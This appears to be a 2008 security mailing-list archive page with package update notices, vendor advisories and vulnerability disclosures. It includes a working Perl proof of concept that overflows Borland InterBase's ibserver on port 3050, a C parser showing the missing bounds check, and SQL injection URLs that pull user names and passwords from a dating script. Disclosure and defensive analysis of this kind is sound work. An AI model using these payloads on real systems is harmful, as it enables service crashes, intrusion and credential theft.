    Size/MD5 checksum:   161850 fc036ed19c3b161c0d8b06b15e47c9d6
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_hppa.deb
    Size/MD5 checksum:  2418880 0f41e79ac16f966b9bb481ea414a0662

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_i386.deb
    Size/MD5 checksum:  2097038 ce792c3212eb3b912abe060b6438e4fc
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_i386.deb
    Size/MD5 checksum:   152302 df7cdbb758709551116b0b7a1af8757b

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_ia64.deb
    Size/MD5 checksum:  2977964 b410a9d5a465433dc6963c9fdf6e7954
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_ia64.deb
    Size/MD5 checksum:   173702 c34442685a8732e55136152c4da8ac90

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_mips.deb
    Size/MD5 checksum:   150700 31f9785f14f2b54963ea6992e201ce6d
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_mips.deb
   

Borland InterBase 2007 "ibserver.exe" Buffer Overflow Vulnerability POC

2008-04-11 Thread Liu Zhen Hua
Borland InterBase 2007 "ibserver.exe" Buffer Overflow Vulnerability POC
 
Affected Software:
Borland InterBase 2007 Service Pack 2.
ibserver.exe version 8.0.0.123

Severity:
High

Summary:
There exists a vulnerability in Borland InterBase 2007.
The attacker who successfully exploited this vulnerability can gain control 
of vulnerable systems.

Details:
There exists a buffer overflow vulnerability in "ibserver.exe" which is 
contained in Borland InterBase 2007 Service Pack 2.

 The vulnerable opcode is 0x52. When malformed data laid out as below is
sent to TCP port 3050,
| 4 bytes Opcode  |  "\x00\x00\x00\x52"
| 4 bytes Unknown |  "\xFF\xFF\xFF\xFF"
| 4 bytes Length1 |  "\x00\x00\x03\xE8"
| Data1           |  "\x41"x1000
| 4 bytes Length2 |  "\x00\x00\x00\x10"
| Data2           |  "\x42"x16

 the InterBase ibserver service will terminate and reboot. This results in
the return address being overwritten as follows.
.text:0041460F mov     ecx, [ebp+arg_4]
.text:00414612 xor     edx, edx
.text:00414614 mov     dx, [ecx]
.text:00414617 push    edx
.text:00414618 mov     eax, [ebp+arg_4]
.text:0041461B mov     ecx, [eax+4]
.text:0041461E push    ecx                 // Data1: "\x41"x1000
.text:0041461F mov     edx, [ebp+arg_0]
.text:00414622 push    edx
.text:00414623 mov     eax, [ebp+arg_0]
.text:00414626 mov     ecx, [eax+4]
.text:00414629 call    dword ptr [ecx+8]   // call function 411136 (strcpy)

.text:00411136 push    ebp
.text:00411137 mov     ebp, esp
.text:00411139 push    ecx
.text:0041113A push    esi
.text:0041113B push    edi
..
.text:00411157 mov     ecx, [ebp+loop_count]
.text:0041115A mov     eax, [ebp+recv_info_struct]
.text:0041115D mov     esi, [eax+0Ch]
.text:00411160 mov     edi, [ebp+arg_4]
.text:00411163 mov     edx, ecx
.text:00411165 shr     ecx, 2
.text:00411168 rep movsd                   // copy 1000 bytes of 0x41 without
                                           // boundary check: buffer overflow
                                           // takes place
.text:0041116A mov     ecx, edx
.text:0041116C and     ecx, 3
.text:0041116F rep movsb

:stack
FrameEBP RetEIP   Syms Symbol
013AF5EC 41414141  N    ibserver!.text + 00026F68
 
How to Reproduce:
Run the POC as below:
poc.pl victimAddress
 
Discovered by:
Liu Zhen Hua
 
###
# POC.pl
###
#!/usr/bin/perl -w
# Author:  Liu Zhen Hua

use IO::Socket;
use strict;

my $host = $ARGV[0];

sub usage {
    print "usage: perl poc.pl serverip\n";
}

if ($#ARGV < 0) {
    usage();
    exit();
}

# ibserver listens on TCP port 3050
my $victim = IO::Socket::INET->new(Proto    => 'tcp',
                                   PeerAddr => $host,
                                   PeerPort => 3050)
    or die "connect to $host:3050 failed: $!\n";

my $pad0 = "\x41" x 1000;   # Data1, Length1 = 0x3E8 (1000 bytes)
my $pad5 = "\x43" x 16;     # Data2, Length2 = 0x10 (16 bytes)

# opcode 0x52, unknown 0xFFFFFFFF, Length1, Data1, Length2, Data2
my $exploit = "\x00\x00\x00\x52\xFF\xFF\xFF\xFF\x00\x00\x03\xE8" . $pad0
            . "\x00\x00\x00\x10" . $pad5;

print $victim $exploit;
print " + Malicious request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
exit;
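As an added example (not Borland's code and not the PoC above), the parser below consumes the opcode 0x52 layout shown in the post and applies the bound that the rep movsd copy at 0x411168 lacks: each declared Length is checked against the destination's capacity and against the bytes actually received before anything is copied. The 64-byte field capacity and the in-memory structure are assumptions; the verdict_* functions build the PoC's message and two variants in memory, and nothing is sent anywhere.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define OP_52      0x52u
#define FIELD_MAX  64u      /* assumed capacity of the fixed destination */

struct op52_msg {
    uint32_t opcode, unknown;
    uint32_t len1;
    uint8_t  data1[FIELD_MAX];
    uint32_t len2;
    uint8_t  data2[FIELD_MAX];
};

/* Reads a big-endian 32-bit word at *off, refusing to read past buflen. */
static int rd_be32(const uint8_t *buf, size_t buflen, size_t *off, uint32_t *v)
{
    if (buflen - *off < 4)
        return -1;
    *v = ((uint32_t)buf[*off] << 24) | ((uint32_t)buf[*off + 1] << 16)
       | ((uint32_t)buf[*off + 2] << 8) | (uint32_t)buf[*off + 3];
    *off += 4;
    return 0;
}

/* Reads one length-prefixed field into dst. The declared length is checked
 * against the destination capacity (the check ibserver's copy loop lacks)
 * and against the bytes actually received; oversized fields are rejected,
 * not truncated, because a truncated protocol message is itself suspect. */
static int rd_field(const uint8_t *buf, size_t buflen, size_t *off,
                    uint8_t *dst, size_t cap, uint32_t *len)
{
    uint32_t n;
    if (rd_be32(buf, buflen, off, &n))
        return -1;
    if (n > cap || n > buflen - *off)
        return -1;
    memcpy(dst, buf + *off, n);
    *off += n;
    *len = n;
    return 0;
}

/* Parses an opcode 0x52 message. Returns 0 on success, -1 on any malformed
 * or oversized field; *m is only meaningful on success. */
int parse_op52(const uint8_t *buf, size_t buflen, struct op52_msg *m)
{
    size_t off = 0;
    memset(m, 0, sizeof *m);
    if (rd_be32(buf, buflen, &off, &m->opcode) || m->opcode != OP_52)
        return -1;
    if (rd_be32(buf, buflen, &off, &m->unknown))
        return -1;
    if (rd_field(buf, buflen, &off, m->data1, FIELD_MAX, &m->len1))
        return -1;
    if (rd_field(buf, buflen, &off, m->data2, FIELD_MAX, &m->len2))
        return -1;
    return 0;
}

static void wr_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Writes a message in the PoC's layout into out (constructed in memory).
 * Returns the number of bytes written, 0 if it does not fit. */
size_t build_op52(uint8_t *out, size_t cap, uint32_t len1, uint8_t fill1,
                  uint32_t len2, uint8_t fill2)
{
    size_t off = 0;
    if (16 + (size_t)len1 + (size_t)len2 > cap)
        return 0;
    wr_be32(out + off, OP_52);        off += 4;
    wr_be32(out + off, 0xFFFFFFFFu);  off += 4;
    wr_be32(out + off, len1);         off += 4;
    memset(out + off, fill1, len1);   off += len1;
    wr_be32(out + off, len2);         off += 4;
    memset(out + off, fill2, len2);   off += len2;
    return off;
}

/* Verdicts for three constructed messages: 0 = accepted, -1 = rejected. */
int verdict_poc(void)        /* the PoC: Length1 = 1000 > FIELD_MAX */
{
    uint8_t buf[1100]; struct op52_msg m;
    size_t n = build_op52(buf, sizeof buf, 1000, 0x41, 16, 0x42);
    return parse_op52(buf, n, &m);
}
int verdict_benign(void)     /* 16-byte fields, both fit */
{
    uint8_t buf[1100]; struct op52_msg m;
    size_t n = build_op52(buf, sizeof buf, 16, 0x41, 16, 0x42);
    return parse_op52(buf, n, &m) == 0 && m.len1 == 16 &&
           m.data1[15] == 0x41 && m.len2 == 16 ? 0 : -1;
}
int verdict_truncated(void)  /* Length1 says 16, only 12 bytes arrived */
{
    uint8_t buf[1100]; struct op52_msg m;
    size_t n = build_op52(buf, sizeof buf, 16, 0x41, 16, 0x42);
    return parse_op52(buf, n - 24, &m);
}
```

The two bounds in rd_field() correspond to the two ways the listing above goes wrong: trusting Length1 over the destination's size is the overflow, and trusting it over the received byte count would read past the receive buffer.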





iDefense Security Advisory 04.09.08: EMC DiskXtender File System Manager Stack Buffer Overflow Vulnerability

2008-04-11 Thread iDefense Labs

iDefense Security Advisory 04.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 09, 2008

I. BACKGROUND

EMC DiskXtender is a data backup and migration suite. It consists of
several applications that are used to manage storing large quantities
of files across multiple storage devices. One of the components of
DiskXtender is the File System Manager, which is used to create and
manage backups. For more information see the vendor's website at the
following URL.

http://software.emc.com/products/product_family/diskxtender_family.htm

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in EMC Corp.'s
DiskXtender could allow an attacker to execute arbitrary code with the
privileges of the affected service.

The File System Manager is prone to a stack-based buffer overflow
vulnerability. When handling requests on the RPC interface with UUID
b157b800-aef5-11d3-ae49-00600834c15f, the service does not properly
validate the length of a string in the request. By making a specially
crafted request, a stack based buffer overflow occurs.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the affected service, usually SYSTEM. In
order to exploit this vulnerability, authentication is required.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in DiskXtender
version 6.20.060 for Windows. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this
issue.

VI. VENDOR RESPONSE

"EMC has issued updates to correct this issue. More details can be found
in knowledgebase article emc184091 available from powerlink.emc.com. EMC
customers can further contact EMC Software Technical Support at
1-877-534-2867."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0962 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/21/2008  Initial vendor notification
02/22/2008  Initial vendor response
04/09/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



[USN-600-1] rsync vulnerability

2008-04-11 Thread Kees Cook
=== 
Ubuntu Security Notice USN-600-1 April 11, 2008
rsync vulnerability
CVE-2008-1720
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.04:
  rsync   2.6.9-3ubuntu1.2

Ubuntu 7.10:
  rsync   2.6.9-5ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Sebastian Krahmer discovered that rsync could overflow when handling ACLs.
An attacker could construct a malicious set of files that when processed
by rsync could lead to arbitrary code execution or a crash.


Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2.diff.gz
  Size/MD5:39403 9633c4376d4aa5d8e4c3da99405ca0d6

http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2.dsc
  Size/MD5:  658 08549083557957c66e73e42aa683f1b5
http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9.orig.tar.gz
  Size/MD5:   811841 996d8d8831dbca17910094e56dcb5942

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2_amd64.deb
  Size/MD5:   275936 633f49faf8c061d199fa1fa109e4d46a

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2_i386.deb
  Size/MD5:   262086 381d1741edd2151b09fdfcd11829246f

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2_powerpc.deb
  Size/MD5:   282406 e8704361305a8308274b253863876766

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2_sparc.deb
  Size/MD5:   270148 d6af336d9d029920c4c9b308e50f1e45

Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1.diff.gz
  Size/MD5:40051 f86fdffdfeb406e1164dd8573c527174

http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1.dsc
  Size/MD5:  658 6ce35afac1779ce799dd10e42535bcb7
http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9.orig.tar.gz
  Size/MD5:   811841 996d8d8831dbca17910094e56dcb5942

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1_amd64.deb
  Size/MD5:   277264 2652f8655e5f33073a90e0d25559aada

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1_i386.deb
  Size/MD5:   263124 90761cc1de553a35fb6c719e5632b84d

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1_powerpc.deb
  Size/MD5:   283556 cc28973832efb6c5e2fe82893ce774d4

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1_sparc.deb
  Size/MD5:   271206 4909fa7ccc14431f6419f51da2487400

w2b.ru multiple products SQL Injection

2008-04-11 Thread noreply
 ---------------------------------------------------
|   Aria-Security Team (Persian Security Network)   |
|   http://Aria-Security.com (For English)          |
|   http://Aria-Security.net (For Farsi)            |
|   Greetz:                                         |
|   AurA, NULL, Kinglet, t3rr0r1st, Moromort        |
|   and to all of our staff                         |
|   Discovered by The-0utl4w                        |
 ---------------------------------------------------

Original Advisory


Vendor: http://w2b.ru 

Affected Script: "Dating Club"


PoC

browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body


Other products have the same problem.

Example

phpHotResources: 
cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/*
(this syntax might not work, but there is SQL injection!)


Original link: http://forum.aria-security.com/showthread.php?p=70


Regards,

The-0utl4w